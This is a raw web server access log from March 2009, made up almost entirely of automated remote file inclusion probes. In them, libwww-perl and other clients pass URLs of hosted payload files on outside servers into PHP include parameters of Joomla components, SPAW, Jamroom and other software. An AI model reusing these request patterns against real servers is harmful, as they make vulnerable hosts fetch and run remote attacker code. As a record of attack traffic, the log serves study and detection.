88.191.89.65 - - [24/Mar/2009:13:45:52 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
88.191.89.65 - - [24/Mar/2009:13:45:52 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
80.72.85.178 - - [24/Mar/2009:13:52:15 -0500] "GET /logs//e404.php?INCLUDE_FOLDER=http://www.labaula.com/language/ma/v4id.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
80.72.85.178 - - [24/Mar/2009:13:52:15 -0500] "GET //e404.php?INCLUDE_FOLDER=http://www.labaula.com/language/ma/v4id.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
69.16.207.162 - - [24/Mar/2009:13:52:20 -0500] "GET /e404.php?DOCUMENT_ROOT=http://kazandoska.ru/pic/idi.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.810"
69.16.207.162 - - [24/Mar/2009:13:52:20 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://kazandoska.ru/pic/idi.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.810"
119.63.193.56 - - [24/Mar/2009:13:52:29 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
125.240.0.80 - - [24/Mar/2009:13:59:13 -0500] "GET //appserv/main.php?appserv_root=http://www.adresar.de/include/idoff1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
125.240.0.80 - - [24/Mar/2009:13:59:13 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.adresar.de/include/idoff1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
125.240.0.80 - - [24/Mar/2009:13:59:13 -0500] "GET /logs/access_log.1231200000//appserv/main.php?appserv_root=http://www.adresar.de/include/idoff1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
81.176.229.202 - - [24/Mar/2009:14:02:42 -0500] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.ssalkong.com/bbs/data/humor/safe1.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
81.176.229.202 - - [24/Mar/2009:14:02:42 -0500] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.ssalkong.com/bbs/data/humor/safe1.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
91.52.191.220 - - [24/Mar/2009:14:06:47 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
91.52.191.220 - - [24/Mar/2009:14:06:52 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
91.52.191.220 - - [24/Mar/2009:14:07:37 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
91.52.191.220 - - [24/Mar/2009:14:07:37 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
69.16.207.162 - - [24/Mar/2009:14:10:48 -0500] "GET /logs/access_log.1235952000/e404.php?DOCUMENT_ROOT=http://kazandoska.ru/pic/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
69.16.207.162 - - [24/Mar/2009:14:10:48 -0500] "GET /e404.php?DOCUMENT_ROOT=http://kazandoska.ru/pic/id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
69.16.207.162 - - [24/Mar/2009:14:10:48 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://kazandoska.ru/pic/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
69.16.207.162 - - [24/Mar/2009:14:11:05 -0500] "GET /logs/access_log.1235952000/e404.php?DOCUMENT_ROOT=http://kazandoska.ru/pic/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
69.16.207.162 - - [24/Mar/2009:14:11:05 -0500] "GET /e404.php?DOCUMENT_ROOT=http://kazandoska.ru/pic/id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
69.16.207.162 - - [24/Mar/2009:14:11:06 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://kazandoska.ru/pic/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.221.130.17 - - [24/Mar/2009:14:12:25 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://anggey.selfip.com/har/myid.txt???%0D?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
77.221.130.17 - - [24/Mar/2009:14:12:25 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://anggey.selfip.com/har/myid.txt???%0D?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
77.221.130.17 - - [24/Mar/2009:14:12:25 -0500] "GET /logs/access_log.1233100800//faqsupport/samplefaqsupport.php?path[docroot]=http://anggey.selfip.com/har/myid.txt???%0D?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
77.221.130.17 - - [24/Mar/2009:14:12:25 -0500] "GET /logs/access_log.1235865600//faqsupport/samplefaqsupport.php?path[docroot]=http://anggey.selfip.com/har/myid.txt???%0D?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
77.221.130.17 - - [24/Mar/2009:14:12:25 -0500] "GET /logs/access_log.1235347200//faqsupport/samplefaqsupport.php?path[docroot]=http://anggey.selfip.com/har/myid.txt???%0D?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
77.221.130.17 - - [24/Mar/2009:14:12:39 -0500] "GET /logs/access_log.1233187200//faqsupport/samplefaqsupport.php?path[docroot]=http://anggey.selfip.com/har/myid.txt???%0D?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
69.16.207.162 - - [24/Mar/2009:14:13:03 -0500] "GET /logs/access_log.1235692800/e404.php?DOCUMENT_ROOT=http://kazandoska.ru/pic/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
81.176.229.202 - - [24/Mar/2009:14:13:05 -0500] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.ssalkong.com/bbs/data/humor/safe1.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
81.176.229.202 - - [24/Mar/2009:14:13:05 -0500] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.ssalkong.com/bbs/data/humor/safe1.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
81.176.229.202 - - [24/Mar/2009:14:13:16 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ssalkong.com/bbs/data/humor/safe1.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
81.176.229.202 - - [24/Mar/2009:14:13:16 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ssalkong.com/bbs/data/humor/safe1.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
219.85.63.226 - - [24/Mar/2009:14:17:46 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.northshoredojo.net//images/z1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
219.85.63.226 - - [24/Mar/2009:14:17:46 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.northshoredojo.net//images/z1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
219.85.63.226 - - [24/Mar/2009:14:17:46 -0500] "GET /logs/access_log.1235174400//modules/4nAlbum/public/displayCategory.php?basepath=http://www.northshoredojo.net//images/z1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
12.53.219.68 - - [24/Mar/2009:14:19:31 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
12.53.219.68 - - [24/Mar/2009:14:19:31 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
12.53.219.68 - - [24/Mar/2009:14:19:31 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
12.53.219.68 - - [24/Mar/2009:14:19:39 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
66.135.39.26 - - [24/Mar/2009:14:21:08 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.idesigner.com.br/form/language/copyright.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
66.135.39.26 - - [24/Mar/2009:14:21:08 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.idesigner.com.br/form/language/copyright.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.135.39.26 - - [24/Mar/2009:14:21:08 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.idesigner.com.br/form/language/copyright.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
66.135.39.26 - - [24/Mar/2009:14:21:10 -0500] "GET /logs/access_log.1232064000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.idesigner.com.br/form/language/copyright.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
218.145.71.158 - - [24/Mar/2009:14:22:53 -0500] "GET /logs/access_log.1230422400/?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.145.71.158 - - [24/Mar/2009:14:22:53 -0500] "GET /?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
218.145.71.158 - - [24/Mar/2009:14:23:00 -0500] "GET /logs/?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
218.145.71.158 - - [24/Mar/2009:14:23:25 -0500] "GET /logs/access_log.1230422400/?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.145.71.158 - - [24/Mar/2009:14:23:25 -0500] "GET /?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
218.145.71.158 - - [24/Mar/2009:14:23:27 -0500] "GET /logs/?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 200 182826 "-""Mozilla/5.0"
125.240.0.80 - - [24/Mar/2009:14:30:07 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.adresar.de/include/idoff1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
125.240.0.80 - - [24/Mar/2009:14:30:07 -0500] "GET /logs/access_log.1233792000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.adresar.de/include/idoff1.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
65.55.208.121 - - [24/Mar/2009:14:30:17 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
125.240.0.80 - - [24/Mar/2009:14:30:17 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.adresar.de/include/idoff1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
65.55.208.121 - - [24/Mar/2009:14:30:17 -0500] "GET /logs/access_log.1155600000 HTTP/1.1" 200 337 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
125.240.0.80 - - [24/Mar/2009:14:30:44 -0500] "GET /logs/access_log.1234569600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.adresar.de/include/idoff1.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
218.106.254.18 - - [24/Mar/2009:14:34:00 -0500] "GET /logs/access_log.1235779200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://roadone.net//board/data/photo/images/idoff1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
89.111.173.113 - - [24/Mar/2009:14:42:31 -0500] "GET /logs//includes/include.right_top.php?cfg[path][templates]=http://www.businesstime.ro/hk? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
89.111.173.113 - - [24/Mar/2009:14:42:31 -0500] "GET //includes/include.right_top.php?cfg[path][templates]=http://www.businesstime.ro/hk? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
77.221.130.17 - - [24/Mar/2009:14:46:48 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://anggey.selfip.com/har/myid.txt???%0D?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
77.221.130.17 - - [24/Mar/2009:14:46:48 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://anggey.selfip.com/har/myid.txt???%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.221.130.17 - - [24/Mar/2009:14:46:48 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://anggey.selfip.com/har/myid.txt???%0D?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
77.221.130.17 - - [24/Mar/2009:14:46:49 -0500] "GET /logs/access_log.1232409600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://anggey.selfip.com/har/myid.txt???%0D?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
77.221.130.17 - - [24/Mar/2009:14:46:51 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://anggey.selfip.com/har/myid.txt???%0D?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
77.221.130.17 - - [24/Mar/2009:14:47:21 -0500] "GET /logs/access_log.1233014400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://anggey.selfip.com/har/myid.txt???%0D?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
77.221.130.17 - - [24/Mar/2009:14:47:24 -0500] "GET /logs/access_log.1233187200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://anggey.selfip.com/har/myid.txt???%0D?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
81.12.13.152 - - [24/Mar/2009:14:47:47 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
81.12.13.152 - - [24/Mar/2009:14:47:47 -0500] "GET /e404.php?DOCUMENT_ROOT=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
81.12.13.152 - - [24/Mar/2009:14:47:51 -0500] "GET /logs/access_log.1235952000/e404.php?DOCUMENT_ROOT=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
81.12.13.152 - - [24/Mar/2009:14:50:36 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
81.12.13.152 - - [24/Mar/2009:14:50:36 -0500] "GET /logs/access_log.1235952000/e404.php?DOCUMENT_ROOT=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
81.12.13.152 - - [24/Mar/2009:14:50:36 -0500] "GET /e404.php?DOCUMENT_ROOT=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
81.176.232.101 - - [24/Mar/2009:14:51:10 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://vanderpik.25cm.nl/mannenweekend/images/idomila.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
81.176.232.101 - - [24/Mar/2009:14:51:10 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://vanderpik.25cm.nl/mannenweekend/images/idomila.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
81.176.232.101 - - [24/Mar/2009:14:51:11 -0500] "GET //config/dbutil.bck.php?confdir=http://vanderpik.25cm.nl/mannenweekend/images/idomila.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
81.176.232.101 - - [24/Mar/2009:14:51:11 -0500] "GET //config/dbutil.bck.php?confdir=http://vanderpik.25cm.nl/mannenweekend/images/idomila.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
65.55.208.123 - - [24/Mar/2009:14:54:23 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [24/Mar/2009:14:54:24 -0500] "GET /logs/access_log.1235260800 HTTP/1.1" 200 137580 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.135.39.26 - - [24/Mar/2009:14:56:26 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.idesigner.com.br/form/language/copyright.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.135.39.26 - - [24/Mar/2009:14:56:26 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.idesigner.com.br/form/language/copyright.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.135.39.26 - - [24/Mar/2009:14:56:31 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.idesigner.com.br/form/language/copyright.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
66.135.39.26 - - [24/Mar/2009:14:56:31 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.idesigner.com.br/form/language/copyright.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
81.176.229.202 - - [24/Mar/2009:15:01:06 -0500] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ssalkong.com/bbs/data/humor/safe1.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
81.176.229.202 - - [24/Mar/2009:15:01:06 -0500] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.ssalkong.com/bbs/data/humor/safe1.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
81.176.229.202 - - [24/Mar/2009:15:01:06 -0500] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ssalkong.com/bbs/data/humor/safe1.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
81.176.229.202 - - [24/Mar/2009:15:01:06 -0500] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.ssalkong.com/bbs/data/humor/safe1.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
81.176.229.202 - - [24/Mar/2009:15:01:12 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ssalkong.com/bbs/data/humor/safe1.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
81.176.229.202 - - [24/Mar/2009:15:01:12 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ssalkong.com/bbs/data/humor/safe1.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
65.55.208.121 - - [24/Mar/2009:15:06:15 -0500] "GET /logs/access_log.1167868800 HTTP/1.1" 200 467 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [24/Mar/2009:15:06:16 -0500] "GET /logs/access_log.1141084800 HTTP/1.1" 200 4737 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [24/Mar/2009:15:06:16 -0500] "GET /logs/access_log.1124150400 HTTP/1.1" 200 775 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [24/Mar/2009:15:06:17 -0500] "GET /logs/access_log.1132876800 HTTP/1.1" 200 780 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [24/Mar/2009:15:06:17 -0500] "GET /logs/access_log.1134950400 HTTP/1.1" 200 330 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [24/Mar/2009:15:06:19 -0500] "GET /logs/access_log.1202947200 HTTP/1.1" 200 588 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [24/Mar/2009:15:06:20 -0500] "GET /logs/access_log.1121731200 HTTP/1.1" 200 367 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [24/Mar/2009:15:06:22 -0500] "GET /logs/access_log.1160179200 HTTP/1.1" 200 1134 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.200.242.34 - - [24/Mar/2009:15:07:11 -0500] "GET /bookmark4u//lostpasswd.php?env[include_prefix]=http://lanaalaadi.com/lana/data/tmp/db.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
74.200.242.34 - - [24/Mar/2009:15:07:11 -0500] "GET /logs/bookmark4u//lostpasswd.php?env[include_prefix]=http://lanaalaadi.com/lana/data/tmp/db.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
81.12.13.152 - - [24/Mar/2009:15:08:12 -0500] "GET /e404.php?DOCUMENT_ROOT=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
81.12.13.152 - - [24/Mar/2009:15:08:13 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
81.12.13.152 - - [24/Mar/2009:15:08:13 -0500] "GET /logs/access_log.1235952000/e404.php?DOCUMENT_ROOT=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
81.12.13.152 - - [24/Mar/2009:15:10:51 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
81.12.13.152 - - [24/Mar/2009:15:10:51 -0500] "GET /e404.php?DOCUMENT_ROOT=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
81.12.13.152 - - [24/Mar/2009:15:10:51 -0500] "GET /logs/access_log.1235952000/e404.php?DOCUMENT_ROOT=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
66.71.203.130 - - [24/Mar/2009:15:10:57 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://polardallas.com/images/swift.gif???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
66.71.203.130 - - [24/Mar/2009:15:10:57 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://polardallas.com/images/swift.gif???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
66.71.203.130 - - [24/Mar/2009:15:11:04 -0500] "GET /logs/access_log.1235606400//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://polardallas.com/images/swift.gif???? HTTP/1.1" 404 367 "-""Mozilla/5.0"
66.71.203.130 - - [24/Mar/2009:15:11:28 -0500] "GET /logs/access_log.1235779200//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://polardallas.com/images/swift.gif???? HTTP/1.1" 404 367 "-""Mozilla/5.0"
211.220.195.71 - - [24/Mar/2009:15:17:33 -0500] "GET /logs/bookmark4u//lostpasswd.php?env[include_prefix]=http://otdelka-stroy.ru/images/f1.gif?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.220.195.71 - - [24/Mar/2009:15:17:33 -0500] "GET /bookmark4u//lostpasswd.php?env[include_prefix]=http://otdelka-stroy.ru/images/f1.gif?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.220.195.71 - - [24/Mar/2009:15:17:33 -0500] "GET /logs/access_log.1230163200/bookmark4u//lostpasswd.php?env[include_prefix]=http://otdelka-stroy.ru/images/f1.gif?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.220.195.71 - - [24/Mar/2009:15:17:38 -0500] "GET /logs/access_log.1235952000/bookmark4u//lostpasswd.php?env[include_prefix]=http://otdelka-stroy.ru/images/f1.gif?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
89.111.173.113 - - [24/Mar/2009:15:22:13 -0500] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.businesstime.ro/hk? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
89.111.173.113 - - [24/Mar/2009:15:22:13 -0500] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.businesstime.ro/hk? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
89.111.173.113 - - [24/Mar/2009:15:22:18 -0500] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.businesstime.ro/hk? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
89.111.173.113 - - [24/Mar/2009:15:22:19 -0500] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.businesstime.ro/hk? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
76.12.235.47 - - [24/Mar/2009:15:27:13 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.cap.org.hk/phpATM/cfg/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
76.12.235.47 - - [24/Mar/2009:15:27:14 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.cap.org.hk/phpATM/cfg/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
76.12.235.47 - - [24/Mar/2009:15:27:14 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.cap.org.hk/phpATM/cfg/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
76.12.235.47 - - [24/Mar/2009:15:27:15 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.cap.org.hk/phpATM/cfg/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
66.71.203.130 - - [24/Mar/2009:15:27:22 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://kashikicks.ru/id4.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
66.71.203.130 - - [24/Mar/2009:15:27:22 -0500] "GET //modules/xfsection/modify.php?dir_module=http://kashikicks.ru/id4.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
66.71.203.130 - - [24/Mar/2009:15:27:22 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://kashikicks.ru/id4.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
66.71.203.130 - - [24/Mar/2009:15:27:22 -0500] "GET //modules/xfsection/modify.php?dir_module=http://kashikicks.ru/id4.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
81.176.229.202 - - [24/Mar/2009:15:28:19 -0500] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://www.ssalkong.com/bbs/data/humor/safe1.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
81.176.229.202 - - [24/Mar/2009:15:28:19 -0500] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.ssalkong.com/bbs/data/humor/safe1.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
162.39.119.102 - - [24/Mar/2009:15:30:44 -0500] "GET /logs/modules/vwar/admin/http://reav1985.altervista.org/idv6.txt???? HTTP/1.1" 404 346 "-""libwww-perl/5.65"
162.39.119.102 - - [24/Mar/2009:15:30:45 -0500] "GET /modules/vwar/admin/http://reav1985.altervista.org/idv6.txt???? HTTP/1.1" 404 341 "-""libwww-perl/5.65"
218.246.20.221 - - [24/Mar/2009:15:40:48 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
